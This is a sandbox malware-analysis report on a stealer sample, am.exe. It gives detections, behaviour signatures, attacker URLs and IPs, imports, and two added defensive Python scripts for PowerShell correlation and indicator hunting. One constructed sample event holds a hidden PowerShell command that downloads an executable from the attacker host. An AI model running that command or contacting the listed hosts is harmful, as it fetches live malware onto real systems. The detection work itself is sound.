Report - am.exe

Tags: Gen1, Generic Malware, Malicious Library, Antivirus, Obsidium protector, .NET framework(MSIL), UPX, Anti_VM, PE File, PE32, OS Processor Check, PNG Format
Created 2024.06.17 16:58
Machine s1_win7_x6401
Filename am.exe
Type PE32 executable (GUI) Intel 80386, for MS Windows
AI Score 1
Behavior Score 10.4
ZERO API file : clean
VT API (file) 37 detected (Penguish, GenericKD, Unsafe, Vcxb, malicious, Rugmi, YzY0OkAwxJ5TJ1ob, Maldldr, rddne, LUMMASTEALER, YXEFLZ, Detected, ai score=81, BScope, Chgt, MxResIcn, PossibleThreat, confidence, 100%)
md5 6cfddd5ce9ca4bb209bd5d8c2cd80025
sha256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
ssdeep 98304:kHRNlpNpt3gSuDdFeznbkRBLwX1Pgedmv72Im/xAgDXMnw4bmVKAHNAXqcMHKYsN:uRrptYDdF8komd8xAUXMwIwHNvcMmN
imphash 9e52db722994d0b4983cfb7f894f2a8e
impfuzzy 384:CXQz/i384paCsuBuxksRTsNZ2DKgTbFCR:CO/i38QdsouZRTgAbER

Signatures (27)

Level Description
danger File has been identified by 37 AntiVirus engines on VirusTotal as malicious
watch Attempts to identify installed AV products by installation directory
watch Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe
watch Network communications indicative of possible code injection originated from the process explorer.exe
watch The process powershell.exe wrote an executable file to disk
notice A process created a hidden window
notice Allocates read-write-execute memory (usually to unpack itself)
notice Checks adapter addresses which can be used to detect virtual network interfaces
notice Checks for the Locally Unique Identifier on the system for a suspicious privilege
notice Creates a shortcut to an executable file
notice Creates a suspicious process
notice HTTP traffic contains suspicious features which may be indicative of malware related traffic
notice One or more potentially interesting buffers were extracted
notice Performs some HTTP requests
notice PowerShell is sending data to a remote host
notice Sends data using the HTTP POST Method
notice Steals private information from local Internet browsers
notice URL downloaded by powershell script
info Checks amount of memory in system
info Checks if process is being debugged by a debugger
info Collects information to fingerprint the system (MachineGuid
info Command line console output was observed
info Queries for the computername
info The executable contains unknown PE section names indicative of a packer (could be a false positive)
info The file contains an unknown PE resource name possibly indicative of a packer
info This executable has a PDB path
info Uses Windows APIs to generate a cryptographic key
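
The three powershell.exe signatures above (hidden window, executable written to disk, URL download and POST) are each weak on their own; stacked on one process they are worth an alert. The following correlation rule is an added example and not part of the sandbox report or the sample: the events are constructed to resemble Sysmon Event ID 1 (process create), 11 (file create) and 3 (network connect) fields, and the command lines in them are hypothetical, since the report does not expose the raw sandbox events or the actual PowerShell command line.

```python
"""Correlate powershell.exe behaviours across Sysmon-style events.

Added example, not part of the sandbox report. Each signature (hidden
window, executable written by powershell.exe, outbound traffic from
powershell.exe) is weak alone; stacked on a single ProcessGuid they are
worth an alert. Event records below are constructed (hypothetical).
"""
import re
from collections import defaultdict

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

# Constructed sample events; the command lines are invented for illustration.
SAMPLE_EVENTS = [
    {"id": 1, "guid": "A1", "image": PS, "parent": "C:\\Users\\user\\Desktop\\am.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -c \"iwr https://contur2fa.recipeupdates.rest/__hh/files/run -OutFile $env:TEMP\\u.exe\""},
    {"id": 11, "guid": "A1", "image": PS, "target": "C:\\Users\\user\\AppData\\Local\\Temp\\u.exe"},
    {"id": 3, "guid": "A1", "image": PS, "dest": "contur2fa.recipeupdates.rest", "port": 443},
    # Benign admin script: visible window, writes a log, no network.
    {"id": 1, "guid": "B2", "image": PS, "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"id": 11, "guid": "B2", "image": PS, "target": "C:\\logs\\backup.log"},
    # explorer.exe reaching the first-stage host (the report's 'possible code
    # injection' note) is not powershell and writes nothing, so this rule ignores it.
    {"id": 3, "guid": "C3", "image": "C:\\Windows\\explorer.exe", "dest": "proresupdate.com", "port": 80},
]

EXEC_EXT = re.compile(r"\.(exe|dll|scr|ps1|bat|cmd|vbs|js)$", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)


def correlate(events):
    """Fold events into one record per ProcessGuid."""
    procs = defaultdict(lambda: {"image": "", "parent": "", "hidden": False,
                                 "exe_writes": [], "connections": []})
    for ev in events:
        p = procs[ev["guid"]]
        p["image"] = p["image"] or ev["image"]
        if ev["id"] == 1:
            p["parent"] = ev["parent"]
            p["hidden"] = bool(HIDDEN.search(ev["cmdline"]))
        elif ev["id"] == 11 and EXEC_EXT.search(ev["target"]):
            p["exe_writes"].append(ev["target"])
        elif ev["id"] == 3:
            p["connections"].append((ev["dest"], ev["port"]))
    return dict(procs)


def score(proc):
    """One point per stacked behaviour; only powershell.exe is scored here."""
    if not proc["image"].lower().endswith("\\powershell.exe"):
        return 0, []
    reasons = []
    if proc["hidden"]:
        reasons.append("hidden window")
    if proc["exe_writes"]:
        reasons.append("wrote executable " + proc["exe_writes"][0])
    if proc["connections"]:
        reasons.append("outbound to " + proc["connections"][0][0])
    if "\\users\\" in proc["parent"].lower():
        # parent binary lives in a user-writable path (Desktop, Downloads, Temp)
        reasons.append("spawned by " + proc["parent"])
    return len(reasons), reasons


def alerts(events, threshold=3):
    """Return (guid, score, reasons) for every process at or above the threshold."""
    return [(guid, s, r) for guid, p in correlate(events).items()
            for s, r in [score(p)] if s >= threshold]


if __name__ == "__main__":
    for guid, s, reasons in alerts(SAMPLE_EVENTS):
        print(guid, s, "; ".join(reasons))
```

The threshold of three means a hidden-window PowerShell that only downloads, or one that only drops a file, does not fire by itself; the parent-in-user-path point is what lifts the am.exe-spawned instance to four and keeps the explorer.exe-launched admin script at zero.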

Rules (14)

Level Name Description Collection
danger Win32_Trojan_Gen_1_0904B0_Zero Win32 Trojan Emotet binaries (upload)
warning Generic_Malware_Zero Generic Malware binaries (download)
warning Generic_Malware_Zero Generic Malware binaries (upload)
watch Antivirus Contains references to security software binaries (download)
watch Antivirus Contains references to security software binaries (upload)
watch Malicious_Library_Zero Malicious_Library binaries (upload)
watch Obsidium_Zero Obsidium protector file binaries (upload)
watch UPX_Zero UPX packed file binaries (upload)
watch Win32_Trojan_PWS_Net_1_Zero Win32 Trojan PWS .NET Azorult binaries (upload)
notice anti_vm_detect Possibly employs anti-virtualization techniques binaries (upload)
info IsPE32 (no description) binaries (upload)
info OS_Processor_Check_Zero OS Processor Check binaries (upload)
info PE_Header_Zero PE File Signature binaries (upload)
info PNG_Format_Zero PNG Format binaries (download)

Network (10)

Request CC ASN Co IP4 Rule ZERO
http://proresupdate.com/h9fmdW5/index.php Unknown 45.152.112.146 clean
https://contur2fa.recipeupdates.rest/__hh/files/run_search US CLOUDFLARENET 172.67.197.250 clean
https://contur2fa.recipeupdates.rest/__hh/files/run US CLOUDFLARENET 172.67.197.250 clean
https://i.imgur.com/yximuB4.png Unknown 146.75.92.193 clean
contur2fa.recipeupdates.rest US CLOUDFLARENET 172.67.197.250 clean
i.imgur.com US FASTLY 199.232.192.193 malicious
proresupdate.com Unknown 45.152.112.146 clean
45.152.112.146 Unknown 45.152.112.146 clean
172.67.197.250 US CLOUDFLARENET 172.67.197.250 clean
146.75.92.193 Unknown 146.75.92.193 malicious

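The indicators in the Network table are not equally useful for hunting: the two attacker-registered hosts and their full URLs are high fidelity, while i.imgur.com and the CLOUDFLARENET/FASTLY addresses are shared infrastructure that benign clients hit constantly. The script below is an added example (not part of the report) that copies the URLs and IPs from the table, tiers them by fidelity, and runs them over constructed proxy log lines in a simple "timestamp src dst host method path" layout.

```python
"""Tier the report's network indicators and match them against proxy logs.

Added example, not part of the sandbox report. URLs and IPs are copied from
the Network table; SHARED_* sets are an assumption drawn from that table's
ASN column (CLOUDFLARENET, FASTLY) and the i.imgur.com rows. Log lines are
constructed.
"""
from urllib.parse import urlparse

REPORT_URLS = [
    "http://proresupdate.com/h9fmdW5/index.php",
    "https://contur2fa.recipeupdates.rest/__hh/files/run_search",
    "https://contur2fa.recipeupdates.rest/__hh/files/run",
    "https://i.imgur.com/yximuB4.png",
]
REPORT_IPS = {"45.152.112.146", "172.67.197.250", "146.75.92.193", "199.232.192.193"}
SHARED_HOSTS = {"i.imgur.com"}                                       # public image host
SHARED_IPS = {"172.67.197.250", "146.75.92.193", "199.232.192.193"}  # Cloudflare / imgur rows


def build_index(urls=REPORT_URLS, ips=REPORT_IPS):
    """Return {kind: {key: tier}} for url, host and ip lookups."""
    idx = {"url": {}, "host": {}, "ip": {}}
    for u in urls:
        p = urlparse(u)
        host = p.hostname.lower()
        shared = host in SHARED_HOSTS
        # a specific path on a shared host is still a decent indicator: medium
        idx["url"][(host, p.path)] = "medium" if shared else "high"
        idx["host"].setdefault(host, "low" if shared else "medium")
    for ip in ips:
        idx["ip"][ip] = "low" if ip in SHARED_IPS else "medium"
    return idx


# Constructed proxy log: ts src_ip dst_ip host method path
SAMPLE_LOG = """\
2024-06-17T17:01:02Z 10.0.0.23 45.152.112.146 proresupdate.com POST /h9fmdW5/index.php
2024-06-17T17:01:05Z 10.0.0.23 172.67.197.250 contur2fa.recipeupdates.rest GET /__hh/files/run
2024-06-17T17:01:09Z 10.0.0.23 146.75.92.193 i.imgur.com GET /yximuB4.png
2024-06-17T17:03:40Z 10.0.0.57 146.75.92.193 i.imgur.com GET /cat.jpg
2024-06-17T17:04:11Z 10.0.0.57 172.67.197.250 some-other-site.example GET /
2024-06-17T17:05:00Z 10.0.0.88 93.184.216.34 example.com GET /
"""


def match_line(line, idx):
    """Most specific match wins: full URL, then host, then destination IP."""
    _ts, src, dst_ip, host, _method, path = line.split()
    host = host.lower()
    if (host, path) in idx["url"]:
        return src, idx["url"][(host, path)], "url", host + path
    if host in idx["host"]:
        return src, idx["host"][host], "host", host
    if dst_ip in idx["ip"]:
        return src, idx["ip"][dst_ip], "ip", dst_ip
    return None


def hunt(log=SAMPLE_LOG, idx=None):
    """Return (src, tier, kind, indicator) for every log line that matches."""
    idx = idx or build_index()
    return [m for m in (match_line(l, idx) for l in log.splitlines() if l.strip()) if m]


def hosts_to_escalate(hits):
    """Sources with at least one high-fidelity hit; low-only sources need more context."""
    return sorted({src for src, tier, _kind, _ind in hits if tier == "high"})


if __name__ == "__main__":
    hits = hunt()
    for h in hits:
        print(h)
    print("escalate:", hosts_to_escalate(hits))
```

On the sample log only 10.0.0.23 is escalated: 10.0.0.57 touched i.imgur.com and a Cloudflare address, which is what any browser does all day, so those two low-tier hits are context for a later investigation, not an alert on their own.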
Suricata ids

PE API

IAT(Import Address Table) Library

WTSAPI32.dll
 0x71ea08 WTSQuerySessionInformationW
 0x71ea0c WTSFreeMemory
 0x71ea10 WTSEnumerateSessionsW
VERSION.dll
 0x71e948 VerQueryValueW
 0x71e94c GetFileVersionInfoA
 0x71e950 VerQueryValueA
 0x71e954 GetFileVersionInfoSizeA
 0x71e958 GetFileVersionInfoW
 0x71e95c GetFileVersionInfoSizeW
IPHLPAPI.DLL
 0x71e210 GetAdaptersAddresses
WININET.dll
 0x71e964 HttpQueryInfoW
 0x71e968 InternetOpenW
 0x71e96c InternetOpenUrlW
 0x71e970 HttpOpenRequestW
 0x71e974 InternetCloseHandle
 0x71e978 InternetConnectW
 0x71e97c HttpAddRequestHeadersW
 0x71e980 InternetQueryDataAvailable
 0x71e984 HttpSendRequestW
 0x71e988 InternetCrackUrlW
 0x71e98c InternetReadFile
 0x71e990 InternetGetConnectedStateExW
KERNEL32.dll
 0x71e218 CreateSemaphoreW
 0x71e21c VirtualQueryEx
 0x71e220 SetUnhandledExceptionFilter
 0x71e224 GetSystemTime
 0x71e228 DuplicateHandle
 0x71e22c MulDiv
 0x71e230 SetLastError
 0x71e234 lstrcmpiW
 0x71e238 lstrlenW
 0x71e23c CompareStringW
 0x71e240 GetCurrentThreadId
 0x71e244 GetSystemTimeAsFileTime
 0x71e248 WritePrivateProfileStringW
 0x71e24c FileTimeToSystemTime
 0x71e250 SystemTimeToFileTime
 0x71e254 InitializeCriticalSection
 0x71e258 MultiByteToWideChar
 0x71e25c DeleteFileW
 0x71e260 GetPrivateProfileStringW
 0x71e264 WideCharToMultiByte
 0x71e268 RaiseException
 0x71e26c DeleteCriticalSection
 0x71e270 InitializeCriticalSectionAndSpinCount
 0x71e274 GetLastError
 0x71e278 LeaveCriticalSection
 0x71e27c EnterCriticalSection
 0x71e280 ResetEvent
 0x71e284 OpenEventA
 0x71e288 SetEvent
 0x71e28c GetCurrentProcessId
 0x71e290 CreateEventA
 0x71e294 WaitForSingleObjectEx
 0x71e298 GetModuleFileNameW
 0x71e29c GetVersionExW
 0x71e2a0 CloseHandle
 0x71e2a4 GetCurrentProcess
 0x71e2a8 GetModuleHandleW
 0x71e2ac GetProcAddress
 0x71e2b0 FindResourceExW
 0x71e2b4 FindResourceW
 0x71e2b8 LoadResource
 0x71e2bc LockResource
 0x71e2c0 SizeofResource
 0x71e2c4 GetProcessHeap
 0x71e2c8 HeapAlloc
 0x71e2cc HeapFree
 0x71e2d0 HeapReAlloc
 0x71e2d4 HeapSize
 0x71e2d8 HeapDestroy
 0x71e2dc CreateThread
 0x71e2e0 ResumeThread
 0x71e2e4 RtlCaptureContext
 0x71e2e8 WriteConsoleW
 0x71e2ec SetEndOfFile
 0x71e2f0 SetStdHandle
 0x71e2f4 SetEnvironmentVariableW
 0x71e2f8 SetEnvironmentVariableA
 0x71e2fc FreeEnvironmentStringsW
 0x71e300 GetEnvironmentStringsW
 0x71e304 GetCommandLineA
 0x71e308 FindFirstFileExW
 0x71e30c ReadConsoleW
 0x71e310 GetOEMCP
 0x71e314 IsValidCodePage
 0x71e318 SetFilePointerEx
 0x71e31c FlushFileBuffers
 0x71e320 EnumSystemLocalesW
 0x71e324 IsValidLocale
 0x71e328 GetConsoleMode
 0x71e32c GetConsoleCP
 0x71e330 GetStdHandle
 0x71e334 FreeLibraryAndExitThread
 0x71e338 GetACP
 0x71e33c GetModuleHandleExW
 0x71e340 RtlUnwind
 0x71e344 GetStringTypeExA
 0x71e348 GetUserDefaultLCID
 0x71e34c LCMapStringA
 0x71e350 GetStringTypeExW
 0x71e354 TerminateProcess
 0x71e358 UnhandledExceptionFilter
 0x71e35c LoadLibraryExA
 0x71e360 IsProcessorFeaturePresent
 0x71e364 FlushInstructionCache
 0x71e368 InterlockedPushEntrySList
 0x71e36c InterlockedPopEntrySList
 0x71e370 InitializeSListHead
 0x71e374 IsDebuggerPresent
 0x71e378 CreateWaitableTimerA
 0x71e37c GetCPInfo
 0x71e380 LCMapStringW
 0x71e384 EncodePointer
 0x71e388 GetStringTypeW
 0x71e38c OutputDebugStringW
 0x71e390 lstrcmpiA
 0x71e394 GetSystemDirectoryA
 0x71e398 GetSystemDirectoryW
 0x71e39c GlobalMemoryStatusEx
 0x71e3a0 CancelIo
 0x71e3a4 SetThreadPriority
 0x71e3a8 GetProcessAffinityMask
 0x71e3ac SetProcessAffinityMask
 0x71e3b0 SetThreadAffinityMask
 0x71e3b4 FindResourceA
 0x71e3b8 GetWindowsDirectoryA
 0x71e3bc DeleteFileA
 0x71e3c0 RemoveDirectoryA
 0x71e3c4 GetComputerNameA
 0x71e3c8 GetTempPathW
 0x71e3cc GetWindowsDirectoryW
 0x71e3d0 VirtualFree
 0x71e3d4 VirtualAlloc
 0x71e3d8 CompareFileTime
 0x71e3dc OpenProcess
 0x71e3e0 GetSystemDefaultLCID
 0x71e3e4 GetGeoInfoW
 0x71e3e8 GetUserGeoID
 0x71e3ec GetSystemPowerStatus
 0x71e3f0 SetErrorMode
 0x71e3f4 ExitThread
 0x71e3f8 GetDiskFreeSpaceA
 0x71e3fc CreateFileA
 0x71e400 LocalAlloc
 0x71e404 GetCurrentDirectoryA
 0x71e408 CreateDirectoryA
 0x71e40c CreateMutexA
 0x71e410 ReleaseMutex
 0x71e414 GetVersionExA
 0x71e418 LoadLibraryA
 0x71e41c GetComputerNameExW
 0x71e420 DeviceIoControl
 0x71e424 GetDriveTypeW
 0x71e428 GetTempPathA
 0x71e42c GlobalMemoryStatus
 0x71e430 GetModuleHandleA
 0x71e434 GetTickCount
 0x71e438 GetTimeZoneInformation
 0x71e43c SystemTimeToTzSpecificLocalTime
 0x71e440 PeekNamedPipe
 0x71e444 CreatePipe
 0x71e448 Process32NextW
 0x71e44c Process32FirstW
 0x71e450 CreateToolhelp32Snapshot
 0x71e454 ReadFile
 0x71e458 QueryPerformanceFrequency
 0x71e45c QueryPerformanceCounter
 0x71e460 SetWaitableTimer
 0x71e464 WaitForMultipleObjects
 0x71e468 InterlockedExchangeAdd
 0x71e46c TerminateThread
 0x71e470 VerSetConditionMask
 0x71e474 VerifyVersionInfoW
 0x71e478 TlsFree
 0x71e47c TlsGetValue
 0x71e480 TlsAlloc
 0x71e484 TlsSetValue
 0x71e488 lstrlenA
 0x71e48c ExitProcess
 0x71e490 GetNumberFormatW
 0x71e494 GetLocaleInfoW
 0x71e498 InterlockedExchange
 0x71e49c FindNextFileW
 0x71e4a0 FindFirstFileW
 0x71e4a4 GetFullPathNameW
 0x71e4a8 FindClose
 0x71e4ac RemoveDirectoryW
 0x71e4b0 GlobalUnlock
 0x71e4b4 GlobalAlloc
 0x71e4b8 lstrcmpA
 0x71e4bc GetModuleFileNameA
 0x71e4c0 SetFileTime
 0x71e4c4 SetFilePointer
 0x71e4c8 GetFileSize
 0x71e4cc GetFileAttributesExW
 0x71e4d0 UnmapViewOfFile
 0x71e4d4 MapViewOfFile
 0x71e4d8 CreateFileMappingW
 0x71e4dc LocalFree
 0x71e4e0 FormatMessageW
 0x71e4e4 GetCurrentThread
 0x71e4e8 LoadLibraryW
 0x71e4ec GetTimeFormatW
 0x71e4f0 GetDateFormatW
 0x71e4f4 WaitForMultipleObjectsEx
 0x71e4f8 GlobalLock
 0x71e4fc CreateSemaphoreA
 0x71e500 ReleaseSemaphore
 0x71e504 GetComputerNameW
 0x71e508 WriteFile
 0x71e50c CreateFileW
 0x71e510 WaitForSingleObject
 0x71e514 HeapCreate
 0x71e518 DecodePointer
 0x71e51c FormatMessageA
 0x71e520 GetCommandLineW
 0x71e524 CreateProcessW
 0x71e528 GetStartupInfoW
 0x71e52c GetLocalTime
 0x71e530 InterlockedDecrement
 0x71e534 InterlockedIncrement
 0x71e538 LoadLibraryExW
 0x71e53c FreeLibrary
 0x71e540 Sleep
 0x71e544 GetPrivateProfileStructW
 0x71e548 WritePrivateProfileStructW
 0x71e54c GetFileType
 0x71e550 CreateEventW
 0x71e554 GlobalFree
 0x71e558 GetSystemInfo
USER32.dll
 0x71e6d0 GetDlgItem
 0x71e6d4 SendMessageW
 0x71e6d8 GetWindowRect
 0x71e6dc SetWindowLongW
 0x71e6e0 LoadImageW
 0x71e6e4 CheckRadioButton
 0x71e6e8 ShowWindow
 0x71e6ec ScreenToClient
 0x71e6f0 MoveWindow
 0x71e6f4 IsWindow
 0x71e6f8 IsDlgButtonChecked
 0x71e6fc EnableWindow
 0x71e700 DefWindowProcW
 0x71e704 CallWindowProcW
 0x71e708 GetParent
 0x71e70c DestroyIcon
 0x71e710 LoadIconW
 0x71e714 SetDlgItemTextW
 0x71e718 EnumWindows
 0x71e71c SetWindowPos
 0x71e720 MapWindowPoints
 0x71e724 GetClientRect
 0x71e728 GetMonitorInfoW
 0x71e72c MonitorFromWindow
 0x71e730 GetWindow
 0x71e734 SetWindowTextW
 0x71e738 DestroyWindow
 0x71e73c keybd_event
 0x71e740 OffsetRect
 0x71e744 DrawTextW
 0x71e748 ReleaseDC
 0x71e74c GetDC
 0x71e750 CharNextW
 0x71e754 GetWindowTextW
 0x71e758 GetWindowTextLengthW
 0x71e75c CreateWindowExW
 0x71e760 SystemParametersInfoW
 0x71e764 LoadCursorW
 0x71e768 GetClassNameW
 0x71e76c SetRectEmpty
 0x71e770 InvalidateRect
 0x71e774 UpdateWindow
 0x71e778 PtInRect
 0x71e77c GetCursorPos
 0x71e780 GetDlgCtrlID
 0x71e784 ReleaseCapture
 0x71e788 LoadStringA
 0x71e78c IsWindowVisible
 0x71e790 GetWindowLongW
 0x71e794 UnregisterClassW
 0x71e798 GetClipboardData
 0x71e79c IsClipboardFormatAvailable
 0x71e7a0 CloseClipboard
 0x71e7a4 SetClipboardData
 0x71e7a8 EmptyClipboard
 0x71e7ac OpenClipboard
 0x71e7b0 GetDlgItemTextW
 0x71e7b4 BringWindowToTop
 0x71e7b8 CharLowerA
 0x71e7bc CharLowerW
 0x71e7c0 DrawTextExW
 0x71e7c4 GetSysColorBrush
 0x71e7c8 MapDialogRect
 0x71e7cc LoadBitmapW
 0x71e7d0 SetWindowPlacement
 0x71e7d4 GetWindowPlacement
 0x71e7d8 GetMenuItemCount
 0x71e7dc CheckMenuItem
 0x71e7e0 IsIconic
 0x71e7e4 SwitchToThisWindow
 0x71e7e8 TranslateAcceleratorW
 0x71e7ec MonitorFromRect
 0x71e7f0 EnableMenuItem
 0x71e7f4 GetTopWindow
 0x71e7f8 PostQuitMessage
 0x71e7fc LoadAcceleratorsW
 0x71e800 GetClassLongW
 0x71e804 SetClassLongW
 0x71e808 DeleteMenu
 0x71e80c CheckDlgButton
 0x71e810 EndDialog
 0x71e814 IsMenu
 0x71e818 GetMenuDefaultItem
 0x71e81c LoadMenuW
 0x71e820 GetSubMenu
 0x71e824 SetForegroundWindow
 0x71e828 CreateIconIndirect
 0x71e82c SetMenuDefaultItem
 0x71e830 RegisterWindowMessageW
 0x71e834 InsertMenuItemW
 0x71e838 GetMenuItemInfoW
 0x71e83c SetMenuItemInfoW
 0x71e840 CreateMenu
 0x71e844 CopyRect
 0x71e848 GetDesktopWindow
 0x71e84c GetMenu
 0x71e850 LoadStringW
 0x71e854 GetForegroundWindow
 0x71e858 CreateDialogParamW
 0x71e85c DialogBoxParamW
 0x71e860 PeekMessageW
 0x71e864 GetMessageW
 0x71e868 TranslateMessage
 0x71e86c DispatchMessageW
 0x71e870 RegisterClassW
 0x71e874 GetClassInfoW
 0x71e878 GetActiveWindow
 0x71e87c MessageBoxW
 0x71e880 FindWindowW
 0x71e884 CallNextHookEx
 0x71e888 SetWindowsHookExW
 0x71e88c UnhookWindowsHookEx
 0x71e890 GetKeyboardState
 0x71e894 DestroyCursor
 0x71e898 DestroyMenu
 0x71e89c MonitorFromPoint
 0x71e8a0 CreatePopupMenu
 0x71e8a4 TrackPopupMenu
 0x71e8a8 AppendMenuW
 0x71e8ac GetDoubleClickTime
 0x71e8b0 GetMessageTime
 0x71e8b4 KillTimer
 0x71e8b8 SetTimer
 0x71e8bc RedrawWindow
 0x71e8c0 IntersectRect
 0x71e8c4 DrawEdge
 0x71e8c8 SetWindowRgn
 0x71e8cc GetScrollPos
 0x71e8d0 SetScrollPos
 0x71e8d4 GetScrollRange
 0x71e8d8 SetScrollRange
 0x71e8dc GetScrollInfo
 0x71e8e0 SetScrollInfo
 0x71e8e4 ShowScrollBar
 0x71e8e8 GetClassInfoExW
 0x71e8ec RegisterClassExW
 0x71e8f0 GetKeyState
 0x71e8f4 GetSystemMetrics
 0x71e8f8 InflateRect
 0x71e8fc PostMessageW
 0x71e900 GetWindowDC
 0x71e904 IsCharAlphaNumericW
 0x71e908 BeginPaint
 0x71e90c EndPaint
 0x71e910 FillRect
 0x71e914 IsWindowEnabled
 0x71e918 GetSysColor
 0x71e91c GetFocus
 0x71e920 DrawFocusRect
 0x71e924 SetCursor
 0x71e928 SetFocus
 0x71e92c SetCapture
 0x71e930 GetCapture
 0x71e934 wsprintfA
 0x71e938 GetUserObjectSecurity
 0x71e93c EnumDisplayDevicesW
 0x71e940 EnumDisplaySettingsExW
GDI32.dll
 0x71e144 GetDIBColorTable
 0x71e148 StretchBlt
 0x71e14c StartDocW
 0x71e150 AbortDoc
 0x71e154 EndDoc
 0x71e158 StartPage
 0x71e15c EndPage
 0x71e160 GetBitmapBits
 0x71e164 CreatePatternBrush
 0x71e168 Ellipse
 0x71e16c GetBitmapDimensionEx
 0x71e170 SetBitmapDimensionEx
 0x71e174 CreateBitmap
 0x71e178 Polyline
 0x71e17c DPtoLP
 0x71e180 GetDeviceCaps
 0x71e184 GetTextMetricsW
 0x71e188 GetCurrentObject
 0x71e18c GetBkColor
 0x71e190 GetTextColor
 0x71e194 Rectangle
 0x71e198 SetPixel
 0x71e19c LineTo
 0x71e1a0 MoveToEx
 0x71e1a4 RoundRect
 0x71e1a8 CreatePen
 0x71e1ac ExtTextOutW
 0x71e1b0 CreateRoundRectRgn
 0x71e1b4 BitBlt
 0x71e1b8 CreateCompatibleDC
 0x71e1bc CreateCompatibleBitmap
 0x71e1c0 SetViewportOrgEx
 0x71e1c4 CreateSolidBrush
 0x71e1c8 GetTextExtentExPointW
 0x71e1cc SaveDC
 0x71e1d0 RestoreDC
 0x71e1d4 SetBkColor
 0x71e1d8 TextOutW
 0x71e1dc GetTextExtentPoint32W
 0x71e1e0 SetBkMode
 0x71e1e4 SetTextColor
 0x71e1e8 GetStockObject
 0x71e1ec CreateFontIndirectW
 0x71e1f0 DeleteDC
 0x71e1f4 SelectObject
 0x71e1f8 GetObjectW
 0x71e1fc CreateDIBSection
 0x71e200 DeleteObject
 0x71e204 CreateDCW
 0x71e208 ExtEscape
COMDLG32.dll
 0x71e110 GetOpenFileNameW
 0x71e114 PrintDlgExW
 0x71e118 GetSaveFileNameW
ADVAPI32.dll
 0x71e000 RegQueryValueExW
 0x71e004 CryptGenRandom
 0x71e008 CryptReleaseContext
 0x71e00c CryptAcquireContextA
 0x71e010 RegEnumKeyExW
 0x71e014 RegQueryInfoKeyW
 0x71e018 SetSecurityDescriptorDacl
 0x71e01c InitializeSecurityDescriptor
 0x71e020 RegDeleteValueW
 0x71e024 RegCreateKeyExW
 0x71e028 RegCreateKeyW
 0x71e02c RegDeleteKeyW
 0x71e030 RegSetValueExW
 0x71e034 RegOpenKeyExW
 0x71e038 RegCloseKey
 0x71e03c GetTokenInformation
 0x71e040 OpenProcessToken
 0x71e044 GetUserNameW
 0x71e048 GetLengthSid
 0x71e04c InitializeAcl
 0x71e050 AddAccessAllowedAce
 0x71e054 SetSecurityDescriptorGroup
 0x71e058 AllocateAndInitializeSid
 0x71e05c FreeSid
 0x71e060 OpenSCManagerW
 0x71e064 EnumServicesStatusExW
 0x71e068 CloseServiceHandle
 0x71e06c RegEnumValueW
 0x71e070 RegQueryValueExA
 0x71e074 OpenServiceW
 0x71e078 QueryServiceConfigW
 0x71e07c EnumServicesStatusW
 0x71e080 OpenThreadToken
 0x71e084 ImpersonateSelf
 0x71e088 LookupAccountSidW
 0x71e08c GetSecurityDescriptorOwner
 0x71e090 IsValidSid
 0x71e094 LookupPrivilegeValueW
 0x71e098 AdjustTokenPrivileges
 0x71e09c GetSidSubAuthorityCount
 0x71e0a0 GetSidLengthRequired
 0x71e0a4 InitializeSid
 0x71e0a8 GetSidIdentifierAuthority
 0x71e0ac GetSidSubAuthority
 0x71e0b0 LsaOpenPolicy
 0x71e0b4 LsaQueryInformationPolicy
 0x71e0b8 LsaFreeMemory
 0x71e0bc CreateServiceA
 0x71e0c0 DeleteService
 0x71e0c4 OpenServiceA
 0x71e0c8 StartServiceA
 0x71e0cc ControlService
 0x71e0d0 OpenSCManagerA
 0x71e0d4 RegOpenKeyExA
 0x71e0d8 ConvertStringSidToSidW
 0x71e0dc RegLoadKeyW
 0x71e0e0 RegUnLoadKeyW
 0x71e0e4 RevertToSelf
 0x71e0e8 AccessCheck
 0x71e0ec IsValidSecurityDescriptor
 0x71e0f0 SetSecurityDescriptorOwner
SHELL32.dll
 0x71e674 DragQueryFileW
 0x71e678 DragFinish
 0x71e67c DuplicateIcon
 0x71e680 Shell_NotifyIconW
 0x71e684 ShellExecuteW
 0x71e688 DoEnvironmentSubstW
 0x71e68c SHGetSpecialFolderPathW
 0x71e690 ShellExecuteExW
ole32.dll
 0x71ea18 PropVariantClear
 0x71ea1c CoSetProxyBlanket
 0x71ea20 CoInitialize
 0x71ea24 CoTaskMemAlloc
 0x71ea28 CoInitializeSecurity
 0x71ea2c CoUninitialize
 0x71ea30 CoInitializeEx
 0x71ea34 CoTaskMemFree
 0x71ea38 CoCreateInstance
 0x71ea3c CoTaskMemRealloc
OLEAUT32.dll
 0x71e580 SafeArrayGetElement
 0x71e584 SystemTimeToVariantTime
 0x71e588 VariantInit
 0x71e58c VariantClear
 0x71e590 SysAllocString
 0x71e594 SysFreeString
 0x71e598 SafeArrayUnaccessData
 0x71e59c SysAllocStringLen
 0x71e5a0 VarUI4FromStr
 0x71e5a4 VariantChangeType
 0x71e5a8 VarBstrFromR8
 0x71e5ac SafeArrayGetUBound
 0x71e5b0 SafeArrayGetLBound
 0x71e5b4 SafeArrayGetElemsize
 0x71e5b8 SafeArrayGetVartype
 0x71e5bc SafeArrayAccessData
 0x71e5c0 SysAllocStringByteLen
 0x71e5c4 SysStringByteLen
 0x71e5c8 VariantCopy
 0x71e5cc VarUdateFromDate
 0x71e5d0 VariantTimeToSystemTime
 0x71e5d4 SysStringLen
RPCRT4.dll
 0x71e5fc UuidCreate
 0x71e600 UuidToStringW
 0x71e604 RpcStringFreeW
SETUPAPI.dll
 0x71e60c SetupDiCallClassInstaller
 0x71e610 CM_Get_DevNode_Registry_PropertyW
 0x71e614 CM_Open_DevNode_Key
 0x71e618 CM_Get_Parent
 0x71e61c SetupOpenFileQueue
 0x71e620 SetupScanFileQueueW
 0x71e624 SetupDiSetDeviceInstallParamsW
 0x71e628 SetupDiGetDeviceInstallParamsW
 0x71e62c SetupDiSetSelectedDriverW
 0x71e630 SetupDiEnumDeviceInfo
 0x71e634 SetupDiGetSelectedDriverW
 0x71e638 CM_Connect_MachineW
 0x71e63c CM_Locate_DevNode_ExW
 0x71e640 CM_Get_Child_Ex
